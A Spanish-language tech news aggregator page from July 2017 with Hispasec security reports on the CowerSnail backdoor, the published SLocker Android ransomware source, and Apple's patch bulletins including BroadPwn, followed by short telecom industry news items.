Hispasec - Thu, 27/07/2017 - 12:02

El mismo grupo de atacantes – sin nombre conocido aún – que crearon SambaCry han creado este nuevo malware, el cual tiene como objetivo a sistemas Windows.

SambaCry fue detectado a principios de junio como un ataque que utilizaba la vulnerabilidad CVE-2017-7494 de Samba (de la que adquiere el nombre) para distribuirse. El objetivo de este malware es aprovechar los recursos del equipo infectado para minar criptomonedas, tales como Bitcoin, Latecoin, Monero, etc., instalando para ello el software CPUminer en el equipo víctima.
CowerSnail, es un backdoor que permite a los atacantes ejecutar cualquier comando en los sistemas infectados. Curiosamente, ambos troyanos usan el mismo C&C: cl.ezreal.space:20480. Lo que apunta a que ambos provienen de los mismo creadores según los investigadores de Kapersky Labs, que descubrieron ambas amenazas.

Sin embargo, hay pocas similitudes más allá de esta. Mientras que SambaCry atacaba a sistemas *nix, CowerSnail está enfocado a sistemas Windows. Además, algunos investigadores aseguran que este nuevo troyano cuenta con otras características especiales, como la recolección de información del equipo que infecta, y que van más allá de instalar software de minado.
Sergey Yunakovsky, de Kapersky Labs, afirma que: 
Después de crear dos troyanos separados, cada uno para una plataforma específica, es muy probable que este grupo continúe produciendo malware en el futuro.
Más información:

CowerSnail, from the creators of SambaCry: https://securelist.com/cowersnail-from-the-creators-of-sambacry/79087/

Daniel Púadpua@hispasec.com@arrowcode_
Categories: Seguridad

Publicado el código fuente para Android de SLocker, el ransomware de las mil caras

Hispasec - Wed, 26/07/2017 - 09:00

SLocker es un ransomware para Android que cifra los archivos y bloquea la pantalla. Se caracteriza por haberse hecho pasar por distintas fuerzas de seguridad de los estados, e incluso por el mismísimo WannaCry, para cobrar el rescate.

Una versión de SLocker la que se disfraza de WannaCry

Como si de una herramienta open source cualquiera se tratase, hace unos días se publicó en GitHub el código fuente de SLocker. El responsable, un usuario bajo el pseudónimo fs0c1ety, Tal y como avisa en la descripción, no es el código fuente original, sino el obtenido tras decompilar una muestra con técnicas de ingeniería inversa. Parece ser que este usuario le está cogiendo el gustillo a eso de decompilar malware para Android y publicar el código fuente, como muestra otro nuevo repositorio en su misma cuenta, esta vez decompilando GhostCtrl, otro peligroso malware para Android que, según la versión, recopila datos personales del terminal, secuestra funcionalidades del teléfono, o todo a la vez.

En vez de centrarnos en el ransomware en sí, sobre el que ya hay información en la red de sobra, vamos a centrarnos en la publicación de su código fuente. El que publica especifica que el código fuente debe ser usado únicamente con propósitos de investigación en seguridad informática. Pero las palabras son sólo palabras, y el patrón es conocido de sobra: se publica el código fuente de un malware y en los días sucesivos florece una gran variedad de versiones de este, compiladas usando como base el código fuente publicado. La verdad, no podemos saber a ciencia cierta la intención de este usuario de GitHub que pide ayuda en una issue (ticket) para compilar el malware.




El código fuente público de malware atrae principalmente a delincuentes con perfil bajo, y no se espera un gran impacto a pesar de la liberación. Los delincuentes más experimentados suelen preferir programar ellos mismos el malware o comprarlo hecho a terceros con soporte y garantía de no ser demasiado público (y por tanto demasiado investigado y detectado). Al no ser atacantes muy sofisticados, los medios de propagación del malware tampoco lo serán, y seguramente se limitarán a intentar colar troyanos usando ingeniería social (haciendo pasar el malware por una herramienta para rootear el móvil o hacer trampas en un videojuego).

¿Cómo evitar ser infectado? El principal punto débil sigue siendo el usuario. Una vez tienes todo software del terminal actualizado, el resto es sentido común. No instales aplicaciones sospechosas (ni siquiera si vienen de Google Play), ya sabes que el malware se disfraza. ¿De verdad necesitas esa aplicación para hacer trampas en un videojuego? Te puede costar un mal rato...


Más información:

SLocker decompiled code leaked online for free, a gift for crooks and hackers
http://securityaffairs.co/wordpress/61323/malware/slocker-source-code.html
Android Smartphones Targeted by WannaCry Lookalike
https://www.bleepingcomputer.com/news/security/android-smartphones-targeted-by-wannacry-lookalike/
Cómo saber si estamos infectados por el troyano GhostCtrl y cómo protegernos de él
https://www.softzone.es/2017/07/17/ghostctrl-nuevo-troyano-android/

Ransomware Recap: Ransomware as a Service Surge, SLocker Resurfaces
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-ransomware-as-a-service-surge-slocker-resurfaces

Carlos Ledesmacledesma@hispasec.com
Categories: Seguridad

Apple parchea Broadpwn entre otras vulnerabilidades en sus últimos boletines

Hispasec - Tue, 25/07/2017 - 17:00
Apple ha publicado 7 boletines de seguridad que solucionan vulnerabilidades en otros tantos de sus productos: iOS, macOS, watchOS, tvOS, Safari, iTunes e iCloud para Windows. En total se corrigen 208 fallos de seguridad entre ellos el célebre “BroadPwn”.

BroadPwn” es el nombre con el que se ha bautizado una vulnerabilidad crítica en chipsets Wi-Fi de Broadcom que podría comprometer remotamente y sin interacción del usuario a los dispositivos afectados. Concretamente, el fallo de seguridad se encuentra en chips de la familia BCM43xx, los cuales son ampliamente utilizados en la industria. Así nos encontramos con que millones de dispositivos Android de diversos fabricantes (HTC, LG, Nexus y Samsung entre otras) y de Apple (en este caso iOS, macOS, watchOS y tvOS) se encuentran afectados.

Por su parte, Google solventó esta vulnerabilidad, con identificador CVE-2017-9417, en su boletín mensual del 5 de julio, mientras que Apple ha presentado la solución en sus boletines del 19 de este mes.

La vulnerabilidad “BroadPwn” ha sido descubierta por Nitay Artenstein de Exodus Intelligence, quien la presentará en los próximos días en la Black Hat USA 2017, donde explicará cómo encontró el error y mostrará una prueba de cómo aprovecharlo para lograr la ejecución de código.

Volviendo a los boletines de Apple, dada la gran cantidad de productos actualizados, vamos a realizar un breve repaso de las actualizaciones publicadas y problemas solucionados:

El sistema operativo para dispositivos móviles de Apple (iPad, iPhone, iPod…), iOS 10.3.3, resuelve 47 vulnerabilidades. Los problemas corregidos están relacionados con múltiples componentes, entre los que se incluyen CoreAudio, Contacts, Messages, Notifications, Telephony, el kernel y WebKit, entre otros. 33 de las vulnerabilidades podrían permitir la ejecución de código.

También se ha publicado la versión 10.12.6 de OS X Sierra y el Security Update 2017-003 para El Capitan y Yosemite. En este caso se solucionan 37 nuevas vulnerabilidades que afectan a múltiples y muy diversos componentes, que entre otros incluyen a Audio, Wi-Fi, Bluetooth, controladores gráficos, y el kernel. La ejecución de código podría ser el impacto potencial provocado por 25 de estos errores de seguridad.

Las actualizaciones también incluye a Safari, el navegador web de Apple, que se actualiza a la versión Safari 10.1.2 para OS X Yosemite 10.10.5, OS X El Capitan 10.11.6, and macOS Sierra 10.12.6. Se solucionan 25 vulnerabilidades debidas a problemas en WebKit, el motor de navegador de código abierto que es la base de Safari. 19 de estas vulnerabilidades son de alta gravedad y podrían permitir la ejecución de código.

De forma similar, Apple publica watchOS 3.2.2, destinada a su reloj inteligente o “smartwatch” Apple Watch. con la que se solucionan hasta 16 vulnerabilidades, la mayoría de ellas (12) podrían permitir la ejecución remota de código arbitrario.

Apple también ha publicado tvOS 10.2.2, para sus televisores, que corrige 38 vulnerabilidades en múltiples componentes, de las cuales 31 son graves.

También se ha publicado iTunes 12.6.2 para Windows 7 y posteriores, una versión menor que incluye la corrección de 23 vulnerabilidades.

Por último, Apple ha publicado la actualización 6.2.2 de iCould para Windows 7 y posteriores 22 problemas de seguridad.


Más información:
iOS 10.3.3
https://support.apple.com/es-es/HT207923

macOS Sierra 10.12.6, Actualización de seguridad 2017-003 El Capitan y
Actualización de seguridad 2017-003 Yosemite
https://support.apple.com/es-es/HT207922

Safari 10.1.2
https://support.apple.com/es-es/HT207921

watchOS 3.2.3
https://support.apple.com/es-es/HT207925

tvOS 10.2.2
https://support.apple.com/es-es/HT207924

iTunes 12.6.2 para Windows
https://support.apple.com/es-es/HT207928

iCloud para Windows 6.2.2
https://support.apple.com/es-es/HT204283

Juan Jose Ruizjruiz@hispasec.com
Categories: Seguridad

La GSMA anuncia los primeros detalles del Mobile World Congress 2018

Canal PDA - Tue, 25/07/2017 - 12:30
La GSMA anunció hoy los primeros detalles del Mobile World Congress 2018, incluidos los expositores, patrocinadores, programas y actividades que tendrán lugar en el evento más importante del sector de las comunicaciones móviles. Bajo el lema “Creating a Better Future”, el Mobile World Congress se celebrará del 26 de febrero al 1 de marzo de […]
Categories: PDA / PPC

Fairphone deja de ofrecer soporte para la primera generación de su smartphone

Canal PDA - Tue, 25/07/2017 - 10:10
Fairphone, la empresa incipiente especializada en smartphones éticos, ha anunciado que dejará de ofrecer soporte para su dispositivo de primera generación y declara que se trata de una “decisión agridulce”. La empresa ha confirmado que dejará de vender componentes para dicho teléfono y que abandona la actualización de software que tenía prevista. Su consejero delegado, […]
Categories: PDA / PPC

Arqiva y Samsung dicen haber realizado la primera prueba de FWA “5G” en Europa

Canal PDA - Tue, 25/07/2017 - 10:05
La firma británica Arqiva, especializada en infraestructuras de comunicaciones, y Samsung han anunciado la realización en el centro de Londres de la primera prueba de campo de la tecnología “5G” Fixed Wireless Access (Acceso Fijo Inalámbrico, conocida por las siglas inglesas FWA) que se realiza en el Reino Unido y en toda Europa.Según Jonathan Freeman, […]
Categories: PDA / PPC

Tigo vende 1.200 torres en Colombia a American Tower

Canal PDA - Tue, 25/07/2017 - 10:05
Colombia Móvil, la filial del grupo Millicom que opera en el país bajo la marca Tigo, ha acordado la venta de unas 1.200 torres al gigante American Tower por un importe estimado de 448.000 millones de pesos colombianos -alrededor de 127 millones de euros- en efectivo.Tigo seguirá utilizando las torres en régimen de alquiler. Mauricio […]
Categories: PDA / PPC

El Tribunal Constitucional español anula el canon digital catalán

Canal PDA - Tue, 25/07/2017 - 10:01
El impuesto de 25 céntimos por cada cliente conectado a internet que la Generalitat de Catalunya cobraba a las operadoras de telecomunicaciones desde el año 2014 ha sido anulado por el Tribunal Constitucional (TC) de España, que considera la tasa en cuestión entra en conflicto con el Impuesto sobre el Valor Añadido (IVA), de competencia […]
Categories: PDA / PPC

Tras un buen segundo trimestre, Google aspira a incrementar beneficios

Canal PDA - Tue, 25/07/2017 - 10:01
Sundar Pichai, consejero delegado de Google, se felicita por lo que considera un “trimestre fenomenal”, porque el gigante de Internet se ha mantenido en la senda del crecimiento a pesar de la cuantiosa multa impuesta por la UE. La empresa matriz de Google, Alphabet, afirma que los ingresos correspondientes al segundo trimestre (divididos entre publicidad […]
Categories: PDA / PPC

Pages

Subscribe to Bytecoders aggregator